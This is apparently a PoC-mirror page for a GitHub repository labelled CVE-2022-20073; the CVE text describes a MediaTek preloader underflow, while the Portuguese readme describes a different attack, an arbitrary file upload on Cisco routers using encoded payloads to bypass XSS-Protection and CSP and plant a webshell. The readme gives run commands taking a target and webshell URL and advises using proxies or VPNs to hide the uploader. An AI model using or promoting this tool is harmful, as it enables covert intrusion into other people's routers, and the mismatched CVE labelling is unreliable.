CVE-2022-20073 PoC — 多款 MediaTek 产品数字错误漏洞

Source

https://github.com/m1erphy/CVE-2022-20073

Associated Vulnerability

Title:多款 MediaTek 产品数字错误漏洞 (CVE-2022-20073)
Description:In preloader (usb), there is a possible out of bounds write due to a integer underflow. This could lead to local escalation of privilege, for an attacker who has physical access to the device, with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS06160841; Issue ID: ALPS06160841.

Description

arbitrary file upload em routers cisco com payloads encodificados para bypassar proteções XSS-PROTECTION e CSP.

Readme

# CVE-2022-20073
arbitrary file upload em routers cisco com payloads encodificados para bypassar proteções XSS-PROTECTION e CSP. 

![Captura de imagem_20240828_034903](https://github.com/user-attachments/assets/75401caa-7777-477a-b794-72e41f81e22e)

# esclarecimento

- aqui vemos um "error input", pois, é necessário uma autenticação, porém, foi injetado com sucesso. todavia, você necessita de achar a senha do router para poder acessar sua shell, ou seja lá qual for seu arquivo upado. mas claro, se o seu alvo não necessariamente tende a requerir autenticação, irá entrar no automático com o link da sua webshell no alvo!
- 
- evite fazer o upload sem proxys/vpn's.
- seja feliz.

# usages

   $ git clone https://github.com/m1erphy/CVE-2022-20073.git
   
   $ cd CVE-2022-20073
   
   $ chmod +x cve-2022-20073.py
   
   $ python3 cve-2022-20073.py <alvo> <webshell-url-raw>

File Snapshot


 [4.0K]  /data/pocs/210a089a2c693436a2703a1f94735c9930b0a927
├── [5.4K]  cve-2022-20073.py
└── [ 894]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!